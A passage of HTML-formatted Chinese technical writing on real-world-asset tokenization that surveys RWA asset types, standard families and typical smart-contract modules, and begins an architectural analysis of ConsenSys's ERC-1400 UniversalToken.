&#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">2. 房地产 / 不动产型 RWA</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">3. 实物 / 设备 / 商品批次型 RWA</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">4. 收益权 / 结构化 / 分割所有权型 RWA</span></span></p><h3 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">2.2 从标准到实现：RWA 常见协议族的“足够了解”</span></span></h3><h4 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">2.2.1 合规证券类标准</span></span></h4><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">这一族标准解决的是：如何在链上发行和流通“受监管的证券 / 证券化产品”，同时满足 KYC、转让限制、强制操作等监管要求。</span></span></p><p><b data-pm-slice="0 0 []"><h4 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:null},&#34;namespaceURI&#34;:&#34;&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:null,&#34;id&#34;:&#34;docs-internal-guid-7394a90c-7fff-a284-0716-7ff8a839ff92&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;heading&#34;,{&#34;tagName&#34;:&#34;h4&#34;,&#34;attributes&#34;:{&#34;dir&#34;:&#34;ltr&#34;,&#34;style&#34;:&#34;margin-top: 12pt; text-indent: 0px; line-height: 25.6px; margin-bottom: 0px; text-align: left;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;,&#34;level&#34;:4},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:null},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span textstyle="" style="font-weight: bold;">2.2.2 房地产 / 不动产类标准</span></span></h4></b></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">房地产 RWA 的核心难点不在“怎么发 Token”，而在“如何把房产的各种信息结构化地、安全地塞进合约里”。</span></span></p><p><b data-pm-slice="0 0 []"><h4 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:null},&#34;namespaceURI&#34;:&#34;&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:null,&#34;id&#34;:&#34;docs-internal-guid-7394a90c-7fff-a284-0716-7ff8a839ff92&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;heading&#34;,{&#34;tagName&#34;:&#34;h4&#34;,&#34;attributes&#34;:{&#34;dir&#34;:&#34;ltr&#34;,&#34;style&#34;:&#34;margin-top: 12pt; text-indent: 0px; line-height: 25.6px; margin-bottom: 0px; text-align: left;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;,&#34;level&#34;:4},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:null},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span textstyle="" style="font-weight: bold;">2.2.3 物理设备 / 实物兑换类标准</span></span></h4></b></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">这类标准通常需要解决两个问题，Token/NFT 怎么和现实中的物品绑定；在这种绑定关系下，如何实现兑换、使用、注销等流程。</span></span></p><p><b data-pm-slice="0 0 []"><h4 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:null},&#34;namespaceURI&#34;:&#34;&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:null,&#34;id&#34;:&#34;docs-internal-guid-7394a90c-7fff-a284-0716-7ff8a839ff92&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;heading&#34;,{&#34;tagName&#34;:&#34;h4&#34;,&#34;attributes&#34;:{&#34;dir&#34;:&#34;ltr&#34;,&#34;style&#34;:&#34;margin-top: 12pt; text-indent: 0px; line-height: 25.6px; margin-bottom: 0px; text-align: left;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;,&#34;level&#34;:4},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:null},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span textstyle="" style="font-weight: bold;">2.2.4 结构化资产 / 通用 RWA 接口类标准</span></span></h4></b></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">这类标准更多是针对“复杂资产结构”和“统一接口”的问题。</span></span></p><p><b data-pm-slice="0 0 []"><h3 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:null},&#34;namespaceURI&#34;:&#34;&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:null,&#34;id&#34;:&#34;docs-internal-guid-7394a90c-7fff-a284-0716-7ff8a839ff92&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;heading&#34;,{&#34;tagName&#34;:&#34;h3&#34;,&#34;attributes&#34;:{&#34;dir&#34;:&#34;ltr&#34;,&#34;style&#34;:&#34;margin-top: 12pt; text-indent: 0px; line-height: 25.6px; margin-bottom: 0px; text-align: left;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;,&#34;level&#34;:3},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:null},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span textstyle="" style="font-size: 20px;font-weight: bold;">2.3 典型 RWA 合约架构</span></span></h3></b></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">不管项目属于上述哪一类，只要是稍微完整一点的 RWA 协议，代码结构上大多都会出现以下几类模块：</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">1. Token 核心模块</span></span></p><ul class="list-paddingleft-1"></ul><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">2. 权限与角色模块</span></span></p><ul class="list-paddingleft-1"></ul><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">3. 合规 / 白名单模块</span></span></p><ul class="list-paddingleft-1"></ul><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">4. 赎回 / 清算模块</span></span></p><p><b data-pm-slice="0 0 []"><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:null},&#34;namespaceURI&#34;:&#34;&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:null,&#34;id&#34;:&#34;docs-internal-guid-7394a90c-7fff-a284-0716-7ff8a839ff92&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;list&#34;,{&#34;type&#34;:&#34;ol&#34;,&#34;style&#34;:null,&#34;class&#34;:&#34;list-paddingleft-1&#34;,&#34;start&#34;:&#34;5&#34;},&#34;listitem&#34;,{&#34;style&#34;:null},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;dir&#34;:&#34;ltr&#34;,&#34;style&#34;:&#34;margin-top: 12pt; text-indent: 0px; line-height: 25.6px; margin-bottom: 0px; text-align: left;&#34;,&#34;role&#34;:&#34;presentation&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:null},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span textstyle="" style="font-weight: normal;">5. 元数据 / 资产信息模块</span></span></p></b></p><ul class="list-paddingleft-1"></ul><p><b data-pm-slice="0 0 []"><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:null},&#34;namespaceURI&#34;:&#34;&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:null,&#34;id&#34;:&#34;docs-internal-guid-7394a90c-7fff-a284-0716-7ff8a839ff92&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;list&#34;,{&#34;type&#34;:&#34;ol&#34;,&#34;style&#34;:null,&#34;class&#34;:&#34;list-paddingleft-1&#34;,&#34;start&#34;:&#34;6&#34;},&#34;listitem&#34;,{&#34;style&#34;:null},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;dir&#34;:&#34;ltr&#34;,&#34;style&#34;:&#34;margin-top: 12pt; text-indent: 0px; line-height: 25.6px; margin-bottom: 0px; text-align: left;&#34;,&#34;role&#34;:&#34;presentation&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:null},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span textstyle="" style="font-weight: normal;">6. 升级与治理模块</span></span></p></b></p><ul class="list-paddingleft-1"></ul><p><b data-pm-slice="0 0 []"><h3 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:null},&#34;namespaceURI&#34;:&#34;&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:null,&#34;id&#34;:&#34;docs-internal-guid-7394a90c-7fff-a284-0716-7ff8a839ff92&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;heading&#34;,{&#34;tagName&#34;:&#34;h3&#34;,&#34;attributes&#34;:{&#34;dir&#34;:&#34;ltr&#34;,&#34;style&#34;:&#34;margin-top: 12pt; text-indent: 0px; line-height: 25.6px; margin-bottom: 0px; text-align: left;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;,&#34;level&#34;:3},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:null},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span textstyle="" style="font-size: 20px;font-weight: bold;">2.4 RWA 快速定位三步法</span></span></h3></b></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">第一步：先读业务材料，标资产类型和标准。</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">第二步：在代码里“搜关键词”。</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 24px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">第三步：完成一张架构图。</span></span></p><ul class="list-paddingleft-1"></ul><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">三、协议族深度解构：主流 RWA 标准的合规模型</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">本章将深入代码层面，对当前主流的 RWA 标准进行解构。</span></span></p><p><b data-pm-slice="0 0 []"><h2 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:null},&#34;namespaceURI&#34;:&#34;&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:null,&#34;id&#34;:&#34;docs-internal-guid-7394a90c-7fff-a284-0716-7ff8a839ff92&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;heading&#34;,{&#34;tagName&#34;:&#34;h2&#34;,&#34;attributes&#34;:{&#34;dir&#34;:&#34;ltr&#34;,&#34;style&#34;:&#34;margin-top: 12pt; text-indent: 0px; line-height: 25.6px; margin-bottom: 0px; text-align: left;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;,&#34;level&#34;:2},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:null},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span textstyle="" style="font-size: 24px;font-weight: bold;">I. 证券型 RWA：ERC-1400 (UniversalToken) 深度分析</span></span></h2></b></p><h3 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">1、合约整体架构</span></span></h3><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">ERC-1400 (UniversalToken) 项目由 ConsenSys 开发，是一个基于 ERC1400 标准的证券型代币发行和管理平台，分区(partition) 管理、持有(hold) 机制、证书验证、基金发行和代币交换等功能。该平台主要用于合规的证券代币发行、交易和管理，具有细粒度的权限控制和监管功能。</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">整个框架我们可以划分为六大核心模块：</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">核心：ERC1400 合约实现了证券通证的全部核心逻辑，包括发行、赎回、转账以及至关重要的分区(Partition) 账本。</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 